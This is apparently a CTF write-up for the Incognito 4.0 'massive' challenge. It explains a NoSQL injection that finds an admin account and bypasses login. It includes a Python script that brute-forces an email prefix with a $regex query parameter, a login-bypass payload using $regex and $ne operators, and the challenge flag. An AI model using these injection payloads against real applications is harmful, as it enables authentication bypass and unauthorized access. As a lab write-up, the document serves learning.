• [Incognito 4.0] massive

    2023. 2. 19.

    by. hackintoanetwork

    To summarize this CTF challenge, it could be solved by performing a NoSQL injection attack.

    The challenge provided a login and registration feature, as well as a functionality to check the existence of an email and whether an account had admin privileges.

    The ultimate goal of the challenge was to log in with an admin account, so I had to find an account with "isAdmin" set to true.


    Payload

    import string
    import requests
    
    url = "http://143.42.131.80:1337/checkUser?email[$regex]=^"
    
    def find_isAdmin_true():
        payload = ""
        for i in string.printable:
            res = requests.get(url=url+i)
            if '{\"exists\":true,\"isAdmin\":true}' in res.text:
                payload = url+i
                print("[+] Payload : " + payload)
                break
    
    if __name__ == "__main__":
        find_isAdmin_true()
        
    # http://143.42.131.80:1337/checkUser?email[$regex]=^f

    To find such an account, I attempted a NoSQL injection attack, and used a Python script to locate the accounts where "isAdmin" was true.


    Exploit

    email[$regex]=^f&password[$ne]=1
    • This payload is a query that searches for emails starting with the letter "f" and having a password that is not 1, using regular expressions with the "^" symbol indicating the start of the string and "f" representing the letter "f". The "$ne" operator means "not equal".

    By instructing to select all documents where the value of the "password" field is not 1, I made the value of the login query true,

    thereby bypassing the login logic.

    FLAG : ictf{m4ss_ass1gnm3nt_1s_d4ng3rou5_93ab21c8}

    'CTF > Incognito 4.0' 카테고리의 다른 글

    [Incognito 4.0] get flag2  (0) 2023.02.19
    [Incognito 4.0] get flag 1  (0) 2023.02.19

    댓글